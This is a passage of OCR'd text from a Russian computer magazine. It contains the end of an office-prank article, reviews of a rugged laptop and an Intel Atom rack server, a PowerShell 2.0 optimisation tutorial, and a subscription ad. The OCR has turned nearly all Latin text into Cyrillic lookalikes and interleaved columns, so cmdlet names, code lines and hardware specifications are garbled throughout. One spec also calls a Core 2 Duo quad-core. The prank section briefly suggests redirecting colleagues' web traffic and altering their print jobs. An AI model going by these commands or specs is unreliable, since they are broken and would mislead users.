веб-сервер, так что пользователи будут всегда попадать на ^оо^іе. 
сот и не смогут воспользоваться его услугами. Так же можно 
поизвращаться с настройкой 5атЬа и СИР5, чтобы перед отправ- 
кой на принтер любой документ сопровождался твоей подписью и 
многое, многое другое. 

ЗАКЛЮЧЕНИЕ 

Пранк — это креативное дело, о котором не читают в статьях, а приду- 
мывают на ходу. Время от времени любого человека посещают идеи 
хороших шуток, остается только реализовать их и наслаждаться резуль- 
татом. Однако не стоит заходить слишком далеко, нужно уважать время 
и нервы других людей, ц-ц 
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5ѴІЧ/АСК 






5ѴМ/АСК 



I ЫаіЬап Віпкегі паШзупаск.ги 




Чемоданчик 





Джеймса Бонда 




СуЬегВоок5855: 

защищенный ноутбук от компании 0Е5ТЕЫ 

> Чипсет: 

Северный мост— Іпіеі 
965СМ 

Южный мост — Іпіеі 
ІСН8М 

> Память: 

2 ЗОБІММ сокета для 
модулей памяти 00Р2 
800/667 БОКАМ 
Максимум 4 Гб 

> Жесткие диски: 

2.5" 5АТАН00, объем 
80-320 Гб 



> Питание: 

Стандартная литий-ионная 6-элементная 
4400 мА/ч (до 3 часов работы] 

Опционально литий-ионная 9-элементная 
6600 мА/Ч (до 4 часов работы] 

> Внешние порты ввода-вывода: 

3 115В 2.0 
1 ІЕЕЕ 1394 (4-ріп) 

1 Ехргезз СагсІ 34/54 
1 ѴОА порт (1 5-ріп Ю-зи Ь] 

1 линейный выходдля внешних колонок 
1 входдля внешнего микрофона 
1 разъем Р Ч - 1 1 для модема (56 КЬрз Ѵ.90] 

1 разъем Р Ч -45 для сети Еібегпеі: 

1 СОМ рог! (9-ріп О-зиЬ] 




Технические характеристики 
СуЬегВоок5855 

> Процессор (один из): 

Іпіеі Соге 2 Био 2.1 -2.8 ГГц Е5В 800 МГц, 3-6 
Мбайт кэш второго уровня 
Іпіеі Сеіегоп М 1 .73-2.26 ГГц Е5В 533 МГц, 1 
Мбайт кэш второго уровня 



> Другое: 

Кард-ридер 4 в 1 (50, ММС, М5, М5 Рго] 
Веб-камера на 1 .3 Мп 
88 клавиш 
Іпіеі НО Аибіо 

Встроенный микрофон и динамики 
ОѴБ+-ЕѴѴ (с поддержкой чтения и записи 
двухслойных дисков] 

> Исполнение: 

Размеры 370ммх276ммх 37,5-40 мм 
Масса: 3 кг 



> Дисплей: 

15.4" ѴѴХОА (1280x800] 



> Видео: 

Іпіеі ОгарЫсз Мебіа Ассеіегаіог ОМАХ31 00 
(до 358 Мб] 



> Сетевые устройства: 

Встроенный 56КѴ.90 факс-модем 
Интегрированный 10/100/1000 Мбит/с сете- 
вой адаптер 

Беспроводной сетевой адаптер Іпіеі Рго 
ѴѴігеІезз 4965АОЫ (802.1 1 а/д] 

ВІиеІооіЬ 2.0, 30 модуль (опционально] 



Тяжела жизнь выездных админов. Все время 
в дороге, ни хорошего обеда, ни удоб- 
ного рабочего места, да еще и этот ноут- 
бук не так повернулся и бац, экран трес- 
нул, клавиши вылетели, динамик трещит, 
стоимость из зарплаты вычли. Тоска. 
Как раз для таких людей компания БЕЗ- 
ТЕИ выпускает ноутбуки серии СуЪегВоок, 
достоинства которых не только в высокой 
технологичности и качестве, но и в повышен- 
ной сопротивляемости внешним воздейс- 
твиям. По словам производителя, «Кибер- 
Книги» можно бросать, трясти, обливать во- 
дой, будучи полностью уверенным в том, что 
они продолжат исправно функционировать. 
Внешне 5855 выглядит действительно бру- 
тально. Корпус выполнен из магниевого 



сплава и упрочнен ребрами жесткости, что 
обеспечивает прочность, легкость и стой- 
кость конструкции к разного рода царапи- 
нам и потертостям. Края ноутбука и крышки 
имеют резиновые накладки, смягчающие 
удар при падении. Верхняя крышка имеет 
специальную конструкцию, защищающую 
ЖК-матрицу от ударов и сдавливаний. Кноп- 
ки управления, сенсорная панель, отверстия 
динамиков имеют защиту от влаги и пыли. 
Все разъемы оснащены резиновыми заглуш- 
ками, а оптический привод — специальным 
замком, защищающим от случайного выдви- 
жения лотка при ударе. Батарея имеет защи- 
ту от скачков напряжения и перегрузок сети. 
СуЪегВоок полностью удовлетворяет тре- 
бованиям американского военного стан- 



дарта МІБ-ЗТН 810Е. Устойчивость к меха- 
ническим ударам и падениям соответствует 
стандарту МІБ-5ТО-8ЮЕ, метод 516.5, процедура 
IV. Устойчивость к вибрации и ударам — стан- 
дарту МІБ-5ТО-8ЮЕ метод 514.5, процедура I. 
Несмотря на все это, ноутбук остается достаточно 
производительной и соответствующей послед- 
ним веяниям ІТ-индустрии рабочей машинкой. 
В качестве процессора используется четырехъ- 
ядерный Ішеі Соге 2 Био, объем оперативной 
памяти может достигать 4 Гб, а объем жесткого 
диска — 320 Гб. «На связь» машинка может вы- 
ходить четырьмя способами: используя ЕгЪег- 
пеі-интерфейс, встроенный модем ѵ.92, модуль 
ѴѴі-Бі или же с помощью опционального ЗС-мо- 
дема. Стоимость устройства составляет вполне 
демократичные 40286 рублей. 
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Атомный сервер 

Ірс2ІІ ІРОВО-1000-10А2: 

Стоечный сервер на платформе Іпіеі Аіот 



Технические характеристики 
Ірс 2 Ц ІРОВО-1000-10А2 

>Тип процессорной платы: 

Міпі-іТХ 



> Процессор: 

I пііеі Аіот 1 .6 ГГц 

> Чипсет: 

Іпіеі 94505Е 

> Память: 

Один разъем ППР2 5СЮІММ 
Стандартно — 51 2 Мб 
Максимально — 2 Гб 0БК2 533 

> Жесткие диски: 

2 5АТА-канала 

Стандартно — 1 жесткий диск 1 60 Гб ВАТА 

> Сетевой интерфейс: 

2 ОідаЬіІ Еібегпеі-канала 

> Питание: 

Блок питания мощностью 1 80 Вт 

> Расширение: 

1 слот расширения РСІ 
Внешние порты ввода-вывода: 

2 порта Р5/2 



2 порта Р5-232 
6 портов 115В 2.0 
1 слот СотрасіЕІазЬ 

> Другое: 

ѴСА контроллер (интерфейс БѴІ, ѴСА] 

Аудиоконтроллер 

50т ОѴО-РѴѴ 

> Система охлаждения: 

Пассивная система охлаждения 
без вентиляторов 

> Исполнение: 

Для установки в стойку (высота 1 II] 
Габариты (ШхВхГ): 483 мм х 43 мм х 220 мм 
Вес 5.5 кг 





Стоечный сервер ІКОВО-ЮОО-ЮА2 от рос- 
^ сийской компании ірс2С не похож на сер- 
5 верные решения других производителей. Он 

й использует пассивную систему охлаждения, 

потребляет рекордно мало электроэнергии и 
весьма компактен. И все это за счет исполь- 
зования мобильной платформы Іпгеі Агот. 
Сервер ІКОВО построен на платформе Іпгеі, 
разработанной для использования в нетбу- 
ках и коммуникаторах, что позволяет ему 
стать рекордсменом сразу в нескольких об- 
ластях. Во-первых, процессоры семейства 
Іпгеі Аіот и набор системной логики 5СН 
очень бережливы во всем, что касается энер- 
гии, поэтому запросы сервера в этом плане 
будут минимальны (примерно 2.5 Вт), что 
позволит сэкономить в будущем. Во-вторых, 
системная плата, используемая совместно 
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с этими процессорами, очень мала, поэто- 
му в глубину сервер имеет всего 220 мм, 
позволяя устанавливать сразу две машины 
в один отсек. В-третьих, Іпгеі Агот не тре- 
бует охлаждения, поэтому сервер не толь- 
ко абсолютно бесшумен, но и долговечен. 
С другой стороны, возможностей Іпгеі Агот 
недостаточно для выполнения серьезных 
серверных задач. В пересчете на «настоя- 
щие» мегагерцы, 1.6 ГГц Іпгеі Агот будут 
равны максимум 800 МГц одного ядра Іпгеі 
Хеоп, что совсем не впечатляет. Плюс ко все- 
му сервер обладает всего одним слотом для 
подключения оперативной памяти и только 
двумя 5АТА-каналами, так что максималь- 
ный объем памяти составит всего 2 Гб опе- 
ративной и 1.5 Тб дисковой (из расчета того, 
что к одному каналу будет подключен ПУП- 



КОМ) . Не густо, но для выполнения функций 
сетевого моста, брандмауэра, принт-серве- 
ра, контроллера домена просто идеально. 
Во всем остальном это вполне стандартный 
сервер начального уровня, обладающий 
двухканальным гигабитным сетевым интер- 
фейсом, шестью портами П5В и встроенным 
видеоадаптером. Разъемами расширения 
пришлось пожертвовать, поэтому для уста- 
новки дополнительных плат доступен толь- 
ко один слот РСІ. В число поддерживаемых 
операционных систем почему-то входят 
домашние версии ѴѴіпсІоѵѵз (Ѵізга, ХР Рго), а 
не их серверные собратья. ІКОВО-ЮОО-ЮА2 
соответствует стандартам ГОСТ и КоН5. 
Цена сервера в стандартной комплекта- 
ции с 512 Мб оперативной памяти и жес- 
тким диском на 160 Гб составляет 700$. 
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I Сергей «дгіпсіег» Ярег 



ічук дгіпгіеггазупаск.ги 



Оболочку 
на прокачку 

СОВЕТЫ ПО ОПТИМИЗАЦИИ КОМАНД И СКРИПТОВ Р0ѴУЕВ5НЕІ.І. 2.0 

РоѵѵегЗЬеІА — оченьудобный инструмент администратора, предоставля- 
ющий практически безграничные возможности по настройке серверов, 
виртуальных машин, а также сбору информации об их состоянии. Он до- 
статочно прост: можно быстро писать скрипты, не вникая в детали. Но 
каки любой язык программирования, РЗ имеетсвоитонкости и нюансы, 
не владея которыми, нельзя эффективно его использовать. 



БЕРЕМ ТОЛЬКО НУЖНОЕ 

Командная оболочка оперирует множеством 
параметров объектов, к отбору которых 
необходимо подходить взвешенно, опре- 
деляясь с их дальнейшей необходимостью. 
Ведь каждый вызванный объект увеличи- 
вает количество памяти, требуемое для его 
хранения. Если взять больше, то в опреде- 
ленный момент получим ошибку "Зузгет. 
ОиЮШетогуЕхсергіоп". То есть сначала 
извлечь все параметры объекта и ненужные 
объекты, а затем отфильтровать то, что 
действительно необходимо, — плохая идея. 
Использование лишних выборок существен- 
но увеличивает время исполнения скрипта и 
повышает требования к системным ресур- 
сам. Лучше сразу взять то, что планируется 
обрабатывать, или выводить дальше. Для 
примера проверь время исполнения двух 
команд: 

Р8> СеБ-Ргосезз I Ѵйіеге ($_. 
РгосеззБате -ед "ехріогег" ) 

Р3> СеС-Ргосезз ехріогег 

Вторая выполнится примерно в два раза быс- 
трее, а полученный результат будет одинаков. 
В больших скриптах при большом количестве 
данных разница в скорости выполнения будет 
весьма ощутимой. 

Теперь ситуация, которая не менее редка в 
сценариях РоѵѵегЗЬеІІ. Есть список объектов, 
и нужно произвести с ними некоторые дейс- 
твия. Для этих целей используют командлет 
РогЕасЬ-ОЬцесг (алиас богеасй) или стандар- 
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тный оператор богеасй (поэтому их часто 
путают) . Например, очень часто в скриптах 
извлекают параметры и присваивают их 
переменным, которые затем последовательно 
обрабатывают. 

Р3> $сотриБегз = СеБ-АБСотриБег 
Р8> ІогеасЬ. ($сотриБег іп 
$сотриБегз) { что-то делаем } 

Этот пример можно переписать несколько 
иначе: 

Р8> СеБ-АБСотриБег | РогЕасК-ОБд есБ 
{ что-то делаем } 

В первом случае мы вначале присваиваем 
значение переменной, а затем считываем. 
Использование каналов (ріреііпез, " | ") и 
командлета ЕогЕасЬ-О^есі: во втором примере 
позволит избежать избыточного хранения 
большого количества данных, так как они 
будут обрабатываться сразу, по мере поступле- 
ния. В итоге вторая команда выполнится быст- 
рее, а ресурсов потребует меньше. При работе 
с командлетами АсгіѵеЭігесЮгу не забываем 
импортировать нужный модуль: 

Р8> ітрогБ-тосІиІе АсБіѵеБігесБогу 

Аналогичная ситуация, только не используется 
явно заданная переменная: 

Р8> ЕогеасЬ. ($сотриБег іп СеБ- 
АБСотриБег) { $сотриБег } 



Здесь все равно вначале извлекаются все 
команды, которые сохраняются в переменной 
(что загружена в память) и затем последова- 
тельно выполняются элементы. Однако время 
работы команды и затраты ресурсов будут все 
же на порядок больше, чем при использовании 
каналов. Но не все так гладко. На простых при- 
мерах можно прийти к выводу, что от использо- 
вания оператора ІогеасЬ лучше отказаться, на 
самом деле внутренняя оптимизация Р5 иногда 
приводит к тому, что в операциях чтения іогеасЬ. 
показывает лучшую производительность. Кроме 
этого, ІогеасЬ предпочтителен, если объект уже 
имеется в памяти, например сохранен в пере- 
менной, то есть нет нужды его извлекать, а надо 
просто обработать. В некоторых случаях необхо- 
димо получить некоторые свойства и обрабо- 
тать их дважды, но по-разному, или сохранить в 
файл и просмотреть в консоли. Можно конечно, 
вызвать команду дважды (будь внимателен, 
например Сег-Ргосезз, вызванный дважды, пока- 
жет разный результат) , или сохранить значение 
в переменной. Но в Р5 есть еще одна интересная 
возможность: направить вывод в два потока. 

Для этой цели используется командлет Тее- 
О^есГ. Например, получаем список процессов, 
сохраняем в файл и выводем на консоль: 

Р8> СеБ-Ргосезз I Тее-ОЬдесБ 

-ЕіІераБЬ. С : Хргосезз . БхБ 

Так как второй получатель не указан, то 
вывод данных производится на консоль. При 
желании можно обработать данные любым 
удобным способом: 
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Р3> Сек-Ргосезз I Тее-ОЬдеск -кііеракк С : Хргосезз . кхк | 
Зогк-ОЬдеск сри 

Чтобы сохранить второй поток в файл, используем командлет Ощ-Рііе: 

Р8> Сек-Ргосезз I Тее-ОЬдеск -кііеракк С : Хргосезз . кхк | 
Зогк-ОЬдеск сри I Оик-Рііе С : \ргосезз-зогк . кхк 

В качестве входного параметра командлет Тее-ОЪуеси может прини- 
мать другой объект, на который следует указать при помощи ключа 
'ЧприЮЩесГ'. 

ЧИТАЕМ ФАЙЛЫ 

Для чтения или разбора файлов используются командлеты Сеі:- 
СоЩепи, 5е1есі>5і:гіп§, которые проходят файл построчно и возвраща- 
ют объект. С файлами большого размера могут быть проблемы, но их 
легко решить, используя дополнительные параметры. Например, в 
СекСопііепі: можно указать количество строк, считываемых за раз и 
передаваемых далее по конвейеру (по умолчанию все) . Например, по 
100 строк: 

Р8> Сек-Сопкепк С : Хзузкет. Іод -Кеаб 100 

Соответственно увеличение этого числа ускоряет процесс чтения, но и 
увеличивает необходимые объемы памяти. Причем при использовании 
Кеаб, скорее всего, потребуется вставка конвейера " | РогЕасЬ-ОЬуеси 
($_) | ", чтобы в последующем возможно было обработать всю запись. К 
слову, команда: 

Р8> Сек-Сопкепк Ьідіодіііе . Іод -геаб 1000 I РогЕаск- 
ОЬдеск {$_} I Шіеге {$_-1іке ' *х* ' } 

выполнится примерно в 3 раза быстрее, чем: 

Р3> Сек-Сопкепк Ьідіодіііе . іод I ТАГЬеге {$_ -ііке ' *х* ' } 



Командлет СекСопііепі: лишь читает файлы, остальная обработка отда- 
на на откуп другим командлетам. Например, Зеіеси-Зітіп^ может читать 
файлы или брать данные из канала, отбирая информацию по шаблону. 
Например, переберем все скрипты Р5 в текущем каталоге в поисках 
подстроки «РоѵѵегЗЬеІІ»: 

Р8> Зеіеск-Зкгіпд -ракк *.рз1 -раккегп " РомегЗкеП " 

Для примера просмотри вывод, казалось бы, подобной команды: 

Р8> Сек-Сопкепк -ракк *.рз1 I ѵікеге {$_ -такск 
" РоѵсюгЗкеІІ " } 

Главное отличие — отсутствие имени файла в выводе результата при 
использовании ѵѵкеге, ведь в этом случае выводятся только совпадения, 
а не объекты. По умолчанию ищутся все вхождения образца, но в неко- 
торых случаях необходимо найти все строки, где образец отсутствует. 
Например, вместо того, чтобы искать все сообщения об ошибках, пре- 
дупреждения (ѴѴагпіп§, Раііесі и т.п.), проще убрать из вывода Зиссезз. 
При помощи дополнительного параметра Зеіесі-Зогіп^ "-поіМаіеЬ" это 
сделать проще, а скрипт будет работать быстрее: 

Р3> Зеіеск-Зкгіпд "Зиссезз" * . Іод -покМакск 

Одна строчка в выводе часто не дает достаточно информации о собы- 
тии, здесь на помощь приходит параметр "-сопіехі", который позволяет 
получить необходимое количество строк до и после совпадения. Напри- 
мер, выведем две строки из журналов до и после события со статусом 
Раііесі: 

Р8> Зеіеск-Зкгіпд "Раііесі" * . іод -сопкепк 2 

По умолчанию поиск регистронезависим, чтобы научить ЗеІескЗШп^ 
понимать регистр, используем "-сазеЗепзкіѵе". 

В некоторых обзорах, в том числе и написанных сертифицированными 
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компонентами сервера 



Форматируем вывод 

При большом количестве данных их визуальный анализ становится затруднитель- 
ным: например, очень трудно найти сообщения об ошибке во множестве записей. 
Но в Р8 довольно просто выделить вывод цветом, что удобнее для восприятия. Для 
этого используется командлет ѴѴгйе-НовІ:, которому в качестве параметра переда- 
ем два параметра: цвет фона (-Васк^гоипсісоіог) и цвет текста (-Роге^гоипсісоіог). 

Р8> СеЕ-Ргосезз | МгіЕе-НозЕ -Еогедгоипсісоіог РагкОгееп -Ъаскдгоипсісоіог тлгМЕе 

В результате получим список процессов на белом фоне зелеными буквами. К сожа- 
лению, ѴѴгйе-НовІ: никак не различает вывод других утилит. То есть если в выводе 
другого командлета присутствует, например Еггог, о цветовой раскраске такого 
сообщения необходимо позаботиться самостоятельно. 

Р8> ІЕ ($а = "Еггог") (МгіСе-НозЕ $а -Еогедгоипсісоіог гесі} 

> еізе 

> {Ѵ7гіСе-НозС $а} 

> } 

Кроме этого, существуют командлеты для определенного типа вывода, позволяю- 
щие " привлечь внимание " : ѴѴгі1:е-ѴѴагпіп§ и ѴѴгіІе-Еггог. 

Р8> МгіЕе-Еггог "Ассезз сіепіесі" 

Вывод многих команд просто огромен, чтобы последовательно просмотреть все 
страницы, не прибегая к скроллингу, можно применить командлет Оиі-Нозі: с 
параметром "-ра§іп§" непокойно изучать листинг: 

Р8> ОеЕ-Ргосезз I ОиС-НозЕ -радіпд 

Есть и ряд других полезных командлетов: СІеаг-Но8І: (очистка экрана), ѴѴгіІе- 
Рго§ге88 (вывод статусбара), 8ог1>ОІуес1: (сортировка вывода). 




Командлеты Р5 выполняются 
быстрее, чем аналогичные сис- 
темныеутилиты 



специалистами Місгозоіт, командлет Зеіесі;- 
5тп§ часто сравнивается с юниксовыми 
утилитами §гер/е§гер. Благо, реализаций §гер 
для ѴѴіпсІОАлге сегодня более чем предостаточно: 
СпиѴѴіп32 Г тш/ѵіп32.5кпеП . ѴѴіпсіоѵѵз §гер 
Гѵѵіп^гер.сот) . СЕШ Сгер Рог ѴѴіпсіоѵѵз (кЕеѵе. 
ог^.ик/ЗоГцдАаге/^гер) . два варианта Сгер Рог 
ѴѴіпсІоѵѵз Г ^герЕо гѵѵіпсіоѵуз . сот, ра^ез.іпііегіо^. 
сот/~шЬаггоп/^гер.Ьііт1) и многие другие. По 
результатам прогонов §гер существенно выиг- 
рывает по скорости выполнения у 5е1еси-5і:гіп§. 

> дгер Магпіпд * . Іод 

Но при его использовании дальнейшую 
обработку данных необходимо производить 
самостоятельно, ведь на выходе мы получаем 
«сырые» данные, а не объекты .Нет. Если же в 
этом нет необходимости, то вполне доста- 
точно использовать и §гер. Напомню, что в 
ѴѴіпсіоѵѵз есть утилита йпбзиг.ехе, позволяю- 
щая находить нужные строки в файлах, но ее 
функционал жутко урезан, поэтому использо- 
вание §гер предпочтительнее. 

В контексте чтения файлов стоит вспомнить 
и о массивах. В Р5 вообще упрощена работа 
с переменными, строками, массивами и 
хеш-таблицами, нужный тип присваивается 
автоматически (проверяется СеиТуре(). 
РиІШате) , размер устанавливается динами- 
чески. В итоге работать с ними удобно, нет 
необходимости в дополнительных провер- 
ках. Но при обработке больших объемов 
данных вроде бы простой скрипт начинает 
заметно тормозить. Все дело в том, что при 
добавлении новых элементов в массив он 
перестраивается, на что опять же нужны 
время и ресурсы. Поэтому, если размеры 
массива известны заранее, то его лучше 
задать сразу, что ускорит в последующем 
работу с ним: 

Р3> $агг = Ыетлг-ОЬд есЕ зЕгіпд [ ] 3 00 



Р3> ОеЕ-Ргосезз I ЗогЕ-ОЬдесЕ сри 



Проверяем параметры массива: 



Теперь мы сразу получим список процессов, отсортированных по проценту ис- Р8> $агг . СеЕТуре ( ) . вазеЕуре 

пользования СРІІ, и не будем отбирать их вручную. При необходимости обратной 

сортировки используем параметр " -Бевсепсііп^ " . Для примера код: 
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Набор командлетов для просмотра систем 
ныхсобытий 



$агг = пем-оЪ} еск іпіа [ ] 1000 
ког ( $ і = 0 ; $і 4Ік 1000; $і + +) 

{ $агг [ $і] = $1*2 > 

выполнится более чем в 10 раз быстрее, по сравнению с: 

$агг = @() 

ког ($.і=0 ; $і -1к 1000; $і + +) 

{$агг += $1*2} 

ВЫРАЖАЕМСЯ РЕГУЛЯРНО 

В Р5 реализован механизм Регі-подобных регулярных 
выражений, что позволяет при необходимости легко 
найти иголку в стоге сена. Если быть точнее, то Р5 



Работа 
с журналами 
сообщений 

После настройки систем и сервисов роль админа 
сводится к наблюдению за их правильной рабо- 
той и отслеживанию текущих параметров. В Р8 
заложен целый ряд "-Еѵепііо^ командлетов, позво- 
ляющих легко считать записи в журнале событий 
как на локальной, так и удаленной системе. Дан- 
ные легко сортируются и отбираются по нужным 
критериям. Например, чтобы вывести только 
последние события из журнала безопасности на 
двух компьютерах, используем параметр " Ыеѵезі: " 
с указанием числового аргумента: 

Р5> Оек-Еѵепкіод Зесигіку -Ыеѵезк 20 -сотрикегпате 

Іосаійозк, зупаск.ги 

Теперь выведем только события, имеющие опре- 
деленный статус: 



Р3> Оек-Еѵепкіод Зесигіку -Меззаде " * Іаііесі* " 

А вот так можно собрать все данные об успеш- 
ной регистрации пользователей (события с 
ЕѵепШЭ = 4624) : 

Р3> Оек-Еѵепкіод Зесигіку I Шіеге-Окд еск {$_. 
ЕѵепкІБ -ед 4624} 




Получаем информацию при помощи Сеі- 
ЕѵепІ_од 



является оболочкой и использует все, что заложено 
в технологии .ЫЕТ Егатеѵѵогк (класс ЗузИет.ТехИ. 
Ке§и1агЕхрге55Іоп5.Ке§ех) . Для поиска совпадения ис- 
пользуется параметр "-тагсй" и его варианты "-старей" 
(сазе-зешігіѵе, регистрозависимый) и "-ітаГсЬ" (сазе 
іпзепзШѵе, регистронезависимый). Например, нам 
нужен список ІР-адресов, полученных при помощи 
ірсопіі^. Проще простого: 

Р5> ірсопкід | ѵйтеге { $_ -такой "\1{3,}"} 

В качестве параметра в Р5 принимается регулярное 
выражение, которое может содержать все принятые знаки 
— *, ?, +, \ѵѵ, \з, \1 и так далее. Проверим правильность 
почтового адреса: 

Р8> $гедех = м/ч [а- 2 ]+\. [а-г] +@зупаск. ги$ " 

> II ($етаі1 -поктакей $гедех) { 



Логокопатель 

\Ѵіпс1оѵѵ$ 

В Р8 ѵ2.о СТРз появился командлет ОеЪ-ѴѴіпЕѵепІ:, 
который в некоторых случаях предоставляет бо- 
лее удобный формат доступа к данным. Получим 
список провайдеров, отвечающих за обновления: 

Р3> Сек-МіпЕѵепк -ЬізкРгоѵісіег *ирсІаке* 
Місгозокк-Міпйомз-МіпІомзОрйакеСІіепк (Зузкеш, 

М і с г о з о к к - Міпскжз - Ѵ7і пйомз кГр йа к еС 1 і епк / 
Орегакіопаі) 

В зависимости от установленных ролей и компо- 
нентов, список будет разным, но нас интересует 
провайдер для ѴѴіпс 1 оі/ѵ 8 Іірсіаііе. Теперь смотрим 
установленные обновления: 



Р3> $ргоѵійег = Оек-ШіпЕѵепк -ЬізкРгоѵісіег 
Місгозокк-Міпйомз-МпйомзІІрйакеСІіепк 
Р3> $ргоѵі<іег . еѵепкз I ? { $_. йезегіркіоп -такой 
"зиссезз") I зеіеск ій, йезегіркіоп I кк -АикоЗіге 




> іпіо 

• Введение 



в РоѵѵегЗЬеІІ — статья 
«Капитан РоѵѵегЗЬеІІ 
и администрирование 
будущего» 

в сентябрьском номе- 
ре за 2009 год. 

•Удаленноеуправ- 
лениепри помощи 
РоѵѵегЗЬеІІ рассмот- 
рено в статье «Незри- 
мое присутствие» 
в][_03_2010. 

• При наборе команд 
не забывай об автодо- 
полнении (клавиша 
<ТаЬ>], а также воз- 
можности копирова- 
ния и вставки правой 
кнопкой мышки. 




НТТР://ѴѴѴШ 

■ ■ 

> Ііпкз 

• Официальные 
ресурсы, посвя- 
щенные РоѵѵегВЬеІІ 

— тіегозоіеот/ 
роѵѵегзЬеЦ. Ыодз. 
тзсІп.сопп/РоѵѵегЗЬеЦ 

• Специализиро- 
ванные ресурсы — 
роѵѵегзЬеЦсоттипіІѵ. 
от. рѵѵгзЬеЦ.пек 
роууегзбеШшйз.сот . 
роѵуегзЬеІІ.ѵѵік.із . 

• ПакетІІпіх^чилит 
для ѴѴіпсІоѵѵз — 
дііуууіі}32^зі}ле1 

• Статья «Регулярные 
выражения Ре К». 

— ѵѵѵѵ.хакер.ги/ 
розі/1 9474 
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В итоге мы можем достаточно просто получить 
любую информацию о состоянии системы. 
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5ѴМ/АСК 



ДР Ад н ни нс і ца т о о. Ѵ/і псіона Рйюёг5ЬеІЗ 






РЕ С:ЧНіпгі<пі5> іпрогѣ-гоосіиіе 

ПОДРОБНО: Илпорт конандлета 
ПОДРОБНО: Нппорт командлета 
ПОДРОБНО: Иппорт командлета 
ПОДРОБНО: Импорт командлета 
^ПОДРОБНО: Импорт командлета 
ПОДРОБНО: Импорт командлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт командлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт конандлета 
ПОДРОБНО: Импорт командлета 
ПОДРОБНО: Импорт конандлета 
РЕ С : \Н іп гіо > _ 



дгоирро Іісу -меѵЬозе 

'Вас кир-СРО"* 

'Сору-СРС'і 
'ОеЪ-СРІ пЬегіЪ алее 
'Сей-СРО 1 '. 

'Се* -СРОНерог* " - 
'Се* -СРРеіччікЕ іопз , 

'Се * -СРР г е Р Не д і 5 * г :у Л а Іие 1 1 * 
'Се*-СРКедІ5егуУа]ліе м . 
'Се*-СРВееи1<:ап*Ее*ОР Роіісу" 
'Се* -СРЕ 1: аИ^гСРО" _ 
'Iтроі*^:“■СР^"_ 

'Неі^СРЬіпк" . 

■Мвн-СРО". 

1 Не «-СРБ * а і** е г С РО 1 1 . 
'Вегшее-СРБ іпк" * 

'Вегшѵе-СРО". 

'Негш ѵе^СРРгсР Вед іе*г уЛа Іие " 
'Не по ѵе-СРКедіз *і к уЛа1ис ” . 
'Вепаріе-СРО"* 

'Кеэ*оге -СРО*'. 

'Ее*-СРІ пЬегі* апсе'"- 
'Ее*”СРЬіпк"_ 

'5 е 1: -СРР е г п іе з іо п з * ' , 

'Ее* “СРРі^еР Нед із* і*уЛа Іие " _ 
'Ее * “СРКед із сгуН а Іие " . 



Модульуправления групповыми политиками 




В некоторых случаях ѴѴИеге приводит к замедле- 
нию работы РоѵѵегБИеІІ скрипта 



> ШгіЕе-Еггог " Іпѵаіісі е-шаіі асісігезз $ешаі1" 

>} 

Теперь, если почтовый адрес не принадлежит домену зупаск.ш 
и не попадает под шаблон (то есть содержит запрещенные зна- 
ки), то пользователь получит сообщение об ошибке (о коман- 
длете ѴѴгіие-Еггог читай в мини-статье «Форматируем вывод») . 
Не буду останавливаться на подробном разборе и перечисле- 
нии всех возможных параметров, используемых в регулярных 
выражениях, это достаточно емкая тема (см. статью «Регу- 
лярные выражения Регі» ѵѵ ѵѵ ѵѵ. хакер, ги /рощ/ 19474) . Кстати, 
на сегодня доступны специальные утилиты, помогающие 
составлять регулярное выражение под требуемую оболочку. 
Например, Ке§ехВисібу Г ге^ехЬибс1ѵ.сот/роѵѵег5Ііе11.Ііі:п ) или 
Ке§ехМа§іс ( ге^ехта^іс.сот) . Кроме поиска совпадения, в Р5 
реализована еще одна ценная возможность — замена содержи- 
мого по шаблону, для чего используется оператор «-геріасе» (а 
также «-ігеріасе» и «-сгеріасе»). Шаблон для замены выглядит 
так: 

-геріасе "шаблон_текста" , "шаблон_замены" 



Например, прочитаем файл и заменим все строки "ѴѴагпіп^", на 
"!!!ѴѴагпіп§": 

Р8> СеЕ-СопЕепЕ -раЕЪ. зузЕет.Іод I ЕогеасЪ. {$_ -геріасе 
"Шагпіпд" , " ! ! ’Шагпіпд" } 

Если второй параметр не указан, совпавшая запись будет просто 
удалена. Как и в Регі, захваченные в первой части выражения 
символы сохраняются в специальных переменных, которые могут 
быть использованы при замене. Так $0 соответствует всему сов- 
павшему тексту, $1 — первое совпадение, $2 — второе и так далее. 
То есть предыдущее выражение можно переписать так: 

Р8> СеЕ-СопЕепЕ -раЕк зузЕет.Іод I Еогеаск {$_ -геріасе 
" (Магпіпд) ", " ! ! ! $0 " } 

цигиль-цигиль 

Теперь, собственно, как и при помощи чего проверять эффек- 
тивность написанного скрипта. Разработчики МісгозоН не 
стали усложнять нам жизнь, и в Р5 из коробки включен специ- 
альный командлет Меазиге-Соттапсі, позволяющий замерить 
время выполнения команды или скрипта. 

Из командной строки Р5 реализован прямой доступ к коман- 
дам оболочки СМИ, объектам СОМ, ѴѴМІ и .ИЕТ, поэтому очень 
удобно определять разницу во времени исполнения самых раз- 
ных утилит. Просто вводим запрос в строке приглашения. Для 
примера произведем два замера: 

Р8> Меазиге-СоштапсІ { ЗегѵегМападегСтсІ -диегу} 
ТоЕаІМіІІізесопсІз : 7912,7428 

Р8> Меазиге-Соішпагкі {СеЕ-МіпсІоѵѵзЕеаЕиге} 
ТоЕаІМіІІізесопсІз : 1248,9875 

Отсюда видно, что нэйтивные команды в Р5 выполняются значительно 
быстрее. 

ЗАКЛЮЧЕНИЕ 

Роѵѵег$1іе11 сделан очень удобным и функциональным, на нем просто 
писать скрипты, выбирать и форматировать данные. Но за удобство 
приходится расплачиваться медлительностью написанных скрип- 
тов. Надеюсь, приведенные советы по оптимизации помогут тебе в 
изучении этой оболочки, □с 
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ПОДПИШИТЕСЬ 

$Нор.дІс.ги 



Подписка - это: 

■ Выгода ■ Гарантия ■ Сервис 



іВ 

2 

< 

О 



СТРАНА 



ИГР 





вювносѴг. 



бмес. 1300 руб. 
12 мес. 2300 руб. 





Призер фестивалей 



